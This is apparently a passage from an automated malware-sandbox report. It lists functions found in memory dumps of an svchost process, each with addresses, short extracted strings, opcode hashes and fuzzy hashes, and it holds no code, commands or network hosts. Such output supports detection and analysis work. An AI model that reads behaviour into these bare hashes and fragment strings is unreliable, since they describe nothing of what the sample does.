                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: ec6e74898a2f8ccca36146741f9ab677099d74079d324f16364027d4b80607c7
                                                                    • Instruction ID: 2dc2a459a6403e80ad5e92499afbed0a3120706da11a753ed0db4f17d453ca7f
                                                                    • Opcode Fuzzy Hash: ec6e74898a2f8ccca36146741f9ab677099d74079d324f16364027d4b80607c7
                                                                    • Instruction Fuzzy Hash: 49619EB1A003529FC709DF68D4908DABBF1FF89314B14899AD0598B362DB30ED85CBE1
                                                                    Function 075DA188 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: a885daf5d99ac13e883c754359a8f455c410d8a34a36e90cf7880d0a7b57080e
                                                                    • Instruction ID: 6f4056a21d569d5ec3e3ab5f8f48eb5e57a906f24a7d4af631542bbae3d7c591
                                                                    • Opcode Fuzzy Hash: a885daf5d99ac13e883c754359a8f455c410d8a34a36e90cf7880d0a7b57080e
                                                                    • Instruction Fuzzy Hash: 42515DB1A002199FDB15CFA9C885AEEBBF2FF88210F14C46AE815AB251D735DD44DB90
                                                                    Function 076CD89F Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Dmq
                                                                    • API String ID: 0-4031372824
                                                                    • Opcode ID: e71d12836316bcd07077afaba83f37fe5aad7d1491cadc0a71eac5e0b930343e
                                                                    • Instruction ID: e4bbcd4e33621a94536a0266d41366885e2f76e93bd371012d3738bb611a1c7c
                                                                    • Opcode Fuzzy Hash: e71d12836316bcd07077afaba83f37fe5aad7d1491cadc0a71eac5e0b930343e
                                                                    • Instruction Fuzzy Hash: 7B518DB4B006019FC714DF2DE484969BBF2FF88310B5581ADD816AB7A1DB34EC41CB94
                                                                    Function 017F9E90 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: 85c4876042f764bfb7731a6a172b286970e6e1cfa900c16d3daa242bcf5bbd0b
                                                                    • Instruction ID: c2e81fb709b955aafb19d62a4f4903a736258aa81f1e936e79ecb737650ec4eb
                                                                    • Opcode Fuzzy Hash: 85c4876042f764bfb7731a6a172b286970e6e1cfa900c16d3daa242bcf5bbd0b
                                                                    • Instruction Fuzzy Hash: 59516A70B40204DFE714DB69D959BAABBF2FF48724F208159EA169B3E1CB75AC41CB40
                                                                    Function 017F1339 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRfq
                                                                    • API String ID: 0-2333822924
                                                                    • Opcode ID: 31985adc1c34e89d5bfffb6c4af9046c00d0eab2bf30994e1d6650da8a3ad52e
                                                                    • Instruction ID: 88957c0ed9eea1122ede2cd633ccd7df3baa98a4390f5048709d51ea4f367e7f
                                                                    • Opcode Fuzzy Hash: 31985adc1c34e89d5bfffb6c4af9046c00d0eab2bf30994e1d6650da8a3ad52e
                                                                    • Instruction Fuzzy Hash: 0141FF34F002168FCB199BBC955496FBBF6EF8A210F50456DE61ADB3A9DE308C018791
                                                                    Function 017F9941 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $fq
                                                                    • API String ID: 0-12477121
                                                                    • Opcode ID: f5f44e881f3f48333b0de5c65a6a46da3b73aa3eeeda54fffb36dec41ce18718
                                                                    • Instruction ID: 0a5b7e216953f115c53d4b3fc9e51eb527fee044d9f5aa3d803bffacf9b9d76d
                                                                    • Opcode Fuzzy Hash: f5f44e881f3f48333b0de5c65a6a46da3b73aa3eeeda54fffb36dec41ce18718
                                                                    • Instruction Fuzzy Hash: E941BB70208656DBCB1A9F69940822BFB36BFC0719339859DF3069B396CB31DD16CB85
                                                                    Function 075CD712 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^p
                                                                    • API String ID: 0-2464009452
                                                                    • Opcode ID: 1535f6b6142d1072e641c77837e250ba83b6e0170e297f49172285367fe70be8
                                                                    • Instruction ID: ee280942f2586c7e5fb3722877147fdb5488ca73ec8144dd5d5d783c6014606e
                                                                    • Opcode Fuzzy Hash: 1535f6b6142d1072e641c77837e250ba83b6e0170e297f49172285367fe70be8
                                                                    • Instruction Fuzzy Hash: 5141F979B002158FCB18DBA4D994AAEB7F7BFC8610F244469D806D73A4DF35AC06CB90
                                                                    Function 075CA418 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: U
                                                                    • API String ID: 0-3372436214
                                                                    • Opcode ID: b385a10132032dc05e83aaa5ab06f552c3504f05a3548857904ed5d03175929d
                                                                    • Instruction ID: a74e60260348dedfa90d4f9e107f868913f12af97a57581a86c9f20b28a5ae74
                                                                    • Opcode Fuzzy Hash: b385a10132032dc05e83aaa5ab06f552c3504f05a3548857904ed5d03175929d
                                                                    • Instruction Fuzzy Hash: 9E415AB57002159FCB15DF78D4889AA7BF2FF8A211B048469E905CB355DB35EE01CBA0
                                                                    Function 017F0D10 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dLlq
                                                                    • API String ID: 0-46837485
                                                                    • Opcode ID: d8b85ba75c4584f46b8a6b81f28756eb3f85b0615185d17b58522fe18cd846e1
                                                                    • Instruction ID: ac32caac5c9545f36d181ad0086f5c29d5b6d955cb10a126ac40b63cab359fcf
                                                                    • Opcode Fuzzy Hash: d8b85ba75c4584f46b8a6b81f28756eb3f85b0615185d17b58522fe18cd846e1
                                                                    • Instruction Fuzzy Hash: DA317075A002048FDB14DF69C448B9EBBF6FF48204F14856DE501AB3A1CB74ED44CB91
                                                                    Function 075DA179 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: a7c37bfac2c930d1d7196ab0f664587d6cc0fffc95f30887496d2190ad82e8d9
                                                                    • Instruction ID: 46e55bab48f190e740d2ff23208529e604e9c3751c371ba53b68a2b569930c6d
                                                                    • Opcode Fuzzy Hash: a7c37bfac2c930d1d7196ab0f664587d6cc0fffc95f30887496d2190ad82e8d9
                                                                    • Instruction Fuzzy Hash: 1A21B172A002199FDB15CFA9C884AEF7BF9FF89220B04846AE504D7211E735DE44DB90
                                                                    Function 075CEBB0 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: ded0a2250f393d85ba051d497dc1b6622d9c5bd0c55dbfa917f5a170815c9437
                                                                    • Instruction ID: 7ea08ca04a43dd6cdaef28be2857aa629b3c5267363e588fba89f268cf1baf47
                                                                    • Opcode Fuzzy Hash: ded0a2250f393d85ba051d497dc1b6622d9c5bd0c55dbfa917f5a170815c9437
                                                                    • Instruction Fuzzy Hash: 80315CB560020ACFC714DFA8D485AAA7BF6FF89310B25446DE806DB361C731ED40CB60
                                                                    Function 017FAD5D Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: f908680bf2158e30bb6b8369a63536400d4876195bf68c4b202cbe69152d6cb4
                                                                    • Instruction ID: b08c1aab382b682e68339ad3a66f479c8b840514085e27d6fa7f5178f372e1af
                                                                    • Opcode Fuzzy Hash: f908680bf2158e30bb6b8369a63536400d4876195bf68c4b202cbe69152d6cb4
                                                                    • Instruction Fuzzy Hash: 35219071B001058FD7049B7AC454BAFFAF7AF8C610F28445AE606EB3A5CEB09C01CB90
                                                                    Function 017F9860 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: 2a5c20db8f99f1149635dc5c3ea43b98352c01ab00a6ebb86480327cc0a96fcd
                                                                    • Instruction ID: 2478aed6c650f0b7f8ceae32d41d7b7d650e974fa9a64c55126b6a034a536c60
                                                                    • Opcode Fuzzy Hash: 2a5c20db8f99f1149635dc5c3ea43b98352c01ab00a6ebb86480327cc0a96fcd
                                                                    • Instruction Fuzzy Hash: 99216A347101158FDB14DB68C418B6ABBF6AF88714F25409EE606DB3A1CA709C04CB91
                                                                    Function 017F9870 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: 24bdc7d986ef97d1a9b386615a166aea492db4947bda0a87a9032923f0564a20
                                                                    • Instruction ID: c73472212127bdfd9ce4597909289097f46ced153a33363c8892cc9d082799e9
                                                                    • Opcode Fuzzy Hash: 24bdc7d986ef97d1a9b386615a166aea492db4947bda0a87a9032923f0564a20
                                                                    • Instruction Fuzzy Hash: 3B215B347101158FDB14DB69D418B6EBBF6AF88724F25815AF602DB3A1CF709C018B91
                                                                    Function 017FAD70 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: a2f11b3093eeb3242511b4a9d0a4056b8a6025b4ccb865279df49502d147e93a
                                                                    • Instruction ID: 7a3f9bc07c21f223be43f740767111e89d33cff4edd6dee45146490d2284daea
                                                                    • Opcode Fuzzy Hash: a2f11b3093eeb3242511b4a9d0a4056b8a6025b4ccb865279df49502d147e93a
                                                                    • Instruction Fuzzy Hash: DF115E70B001158FE7149B6EC455B6FFAE7AF88710F24846EE606EB3A4CEB09C01CB90
                                                                    Function 017F3A08 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |
                                                                    • API String ID: 0-2343686810
                                                                    • Opcode ID: e1f35c18b8245deb8cef985a4ac8cbc967729b52299daa59b24d8854394ef5c8
                                                                    • Instruction ID: 3c9bbd783aafc4a112b6d6f892144131fc35f3c3a91fade9e0187c150fa74149
                                                                    • Opcode Fuzzy Hash: e1f35c18b8245deb8cef985a4ac8cbc967729b52299daa59b24d8854394ef5c8
                                                                    • Instruction Fuzzy Hash: A4117F75F00215DFDB40EB798904B6EBBF5BF88640F1484ADE60AE7395EB359900CB90
                                                                    Function 017F9D77 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: 967b77183bcb6e42cb987c0b9a19b9019a57a62761bc19909ab0e33be07c309f
                                                                    • Instruction ID: 15f5b44d397256f96a9fe41c18f85e672bab1f76bf66abfec0a61976847dfa57
                                                                    • Opcode Fuzzy Hash: 967b77183bcb6e42cb987c0b9a19b9019a57a62761bc19909ab0e33be07c309f
                                                                    • Instruction Fuzzy Hash: 7C117F74B00104DFDB149F69C498B6EBBF6EF88714F154069FA01AB3A5CE719C45CB91
                                                                    Function 017F9D88 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: fe68177cd6f8b20684c8201fcaabe37b2330e5fc687875e928334743f490b412
                                                                    • Instruction ID: 13bab45ae5eb27666f458cc75f784c5fbeccebfa19fd7a0469367b8b9c768826
                                                                    • Opcode Fuzzy Hash: fe68177cd6f8b20684c8201fcaabe37b2330e5fc687875e928334743f490b412
                                                                    • Instruction Fuzzy Hash: 66113D70B101049FDB149F69C499BAABBF6AF88714F144059FA02AB3A5CA719C41CB90
                                                                    Function 017FACB0 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: af616ac6b828df0ef38ec2ed5fa4dcc55c806c95bd2d3db0fbdcb153a938c1f2
                                                                    • Instruction ID: df59ead7f96d27e582f89da915cea93061460bcaea74905bbb4ae51708bdb22c
                                                                    • Opcode Fuzzy Hash: af616ac6b828df0ef38ec2ed5fa4dcc55c806c95bd2d3db0fbdcb153a938c1f2
                                                                    • Instruction Fuzzy Hash: A911AC717002049FCB189B29C859BAEBBF6AF88711F20406DE606EB3A0CF759C05CB91
                                                                    Function 075CDD38 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: W
                                                                    • API String ID: 0-655174618
                                                                    • Opcode ID: ed6ee51bf5564e31050cad50e0d6d1d1c455b3998d9b290fd6d4fe74a52406c7
                                                                    • Instruction ID: 1e3ed68390eda22823a814d4bef0f6e3f7302a5bee4084bab39b03aedd4069b5
                                                                    • Opcode Fuzzy Hash: ed6ee51bf5564e31050cad50e0d6d1d1c455b3998d9b290fd6d4fe74a52406c7
                                                                    • Instruction Fuzzy Hash: 20119EB5A012999FDB04DFA4D550ADDBFF2AF48310F10806AE801B7250CB305D40CF90
                                                                    Function 017F9367 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: 773c79454e88cad07ede7e19f6e16572298d1d09618cc3b6fccfe286fc5eec74
                                                                    • Instruction ID: 5d509767d1b322802ee88216191589c33af6865f9c9784c658429b4669a5b26f
                                                                    • Opcode Fuzzy Hash: 773c79454e88cad07ede7e19f6e16572298d1d09618cc3b6fccfe286fc5eec74
                                                                    • Instruction Fuzzy Hash: F501B531B001059FCB48EBF8E855A9D3BA1FF85218F0050DDD105AB3A5DF3A9D058B82
                                                                    Function 017F0E3F Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq
                                                                    • API String ID: 0-3368716452
                                                                    • Opcode ID: 9c7504db5606d7b535e7712fd64c2586caafa4d0f6eaef742e98446cea24a5b9
                                                                    • Instruction ID: 781ee2784bb60988218bdf947dd13407c842ae5a48c42c562d5c8cd96af98237
                                                                    • Opcode Fuzzy Hash: 9c7504db5606d7b535e7712fd64c2586caafa4d0f6eaef742e98446cea24a5b9
                                                                    • Instruction Fuzzy Hash: 94F0C2217083505FC74AAA3D585442FBFDBAFDA15031544AAF349CB3A7CE658C0683A5
                                                                    Function 075C8D58 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: 9c8f77d6e472aa23cd73b66a51ba8f476e8f3d9bd904f4c17f0da1013b9ffc11
                                                                    • Instruction ID: cc0ef4596baec2363cd58d3567830436e19a6756278ea38dc2c81fe5bd2e4da6
                                                                    • Opcode Fuzzy Hash: 9c8f77d6e472aa23cd73b66a51ba8f476e8f3d9bd904f4c17f0da1013b9ffc11
                                                                    • Instruction Fuzzy Hash: 6501D6713006022FC719E728E850AAFBBEAEBC6240704456ED405CBA55DF25AC46D3F1
                                                                    Function 076C8752 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xjq
                                                                    • API String ID: 0-3434123017
                                                                    • Opcode ID: 4581025c2551bb3abdf09809553fc53d51959152e7641ba000c057fde8152838
                                                                    • Instruction ID: fdf0531d196d0d3a1a6c8de0834414f1e906fb22ab3b8d0c2a1c12405d09cebf
                                                                    • Opcode Fuzzy Hash: 4581025c2551bb3abdf09809553fc53d51959152e7641ba000c057fde8152838
                                                                    • Instruction Fuzzy Hash: C4018FB17147008FD718EB28E849BBB37A2EBC5614F10852DE55A8B784DB39AC46DB40
                                                                    Function 076C876E Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xjq
                                                                    • API String ID: 0-3434123017
                                                                    • Opcode ID: 55440ad219db64f3f689bd3835ecc610ce7c2b4bc46154a1d89ac2c54c4afbcc
                                                                    • Instruction ID: f73fecfd21a0df667ad7b855db8587e5920768ae629db02d0d41de1d2b69283f
                                                                    • Opcode Fuzzy Hash: 55440ad219db64f3f689bd3835ecc610ce7c2b4bc46154a1d89ac2c54c4afbcc
                                                                    • Instruction Fuzzy Hash: 3E0162747107008FD748EF28E959BBA76A2EBC4714F00815DA9078B7C4DF39AC15DB40
                                                                    Function 075C8D68 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: dcfe5c306effb37ccd8615335bf533acc8e3c3b98e6f2b9699d64a1a24c0caf1
                                                                    • Instruction ID: fa057cdc5c239b5f30cbfb95385be0440648fe5f3a085723b64a78c111bb5260
                                                                    • Opcode Fuzzy Hash: dcfe5c306effb37ccd8615335bf533acc8e3c3b98e6f2b9699d64a1a24c0caf1
                                                                    • Instruction Fuzzy Hash: C7F096703006025BC61CE76CD4909AE77D7EBC9640314492DD406CB754EF35EC4697E1
                                                                    Function 075D8F40 Relevance: .6, Instructions: 584COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6497b7d79473f29879e01ba3bef049d64fd246755ceef83113c4646d34b39cea
                                                                    • Instruction ID: 5950fb2c0b291134b75fcf0bd3bf49af21370adde9cba8859bb3bb9f30b77641
                                                                    • Opcode Fuzzy Hash: 6497b7d79473f29879e01ba3bef049d64fd246755ceef83113c4646d34b39cea
                                                                    • Instruction Fuzzy Hash: A4423BB5600706DFC725DF68C58499AFBF2FF88310B158A69E44A9B652DB30FC85CB90
                                                                    Function 075C9748 Relevance: .5, Instructions: 510COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5bf7dad00a3d76a997f446616b9c86003480af8171bb04b87bccf0fdecdef6c
                                                                    • Instruction ID: d190cc9a73fad6227daef9218146b487dc56d9ca5ddb57c0ecb43233e3b78a19
                                                                    • Opcode Fuzzy Hash: e5bf7dad00a3d76a997f446616b9c86003480af8171bb04b87bccf0fdecdef6c
                                                                    • Instruction Fuzzy Hash: A61238B47006028FCB14DF69C898AAABBF6FF89300B1544ADE506DB362DB35EC45CB51
                                                                    Function 017FF4C0 Relevance: .5, Instructions: 496COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea4dd9e6884a9594a642298a9b7105b8cb8f01a6061301b5f9be3791c3620b0d
                                                                    • Instruction ID: c6e43a0ac17d51e7f0056085a3fd5a72f57f34b0fe1fd526ac8362cb6d8399b2
                                                                    • Opcode Fuzzy Hash: ea4dd9e6884a9594a642298a9b7105b8cb8f01a6061301b5f9be3791c3620b0d
                                                                    • Instruction Fuzzy Hash: 94125C75B40211CFCB08DF38D69882A77F6EF8965431145A9EA19CB37AEB31EC45CB90
                                                                    Function 017FEDF8 Relevance: .4, Instructions: 399COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b3d01d02a43be47a5e567e815eb2c6d2e131217a75c7b5a98a4b5735d1fa7455
                                                                    • Instruction ID: c8f1b03c07fab9462599ed457e417c68f42fa1189b190468610cb5388d839e39
                                                                    • Opcode Fuzzy Hash: b3d01d02a43be47a5e567e815eb2c6d2e131217a75c7b5a98a4b5735d1fa7455
                                                                    • Instruction Fuzzy Hash: 29F148757006018FDB55DF29C499AAABBE2FF89310F1984ADE646CB372CB35E900CB51
                                                                    Function 075CF2A0 Relevance: .3, Instructions: 346COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
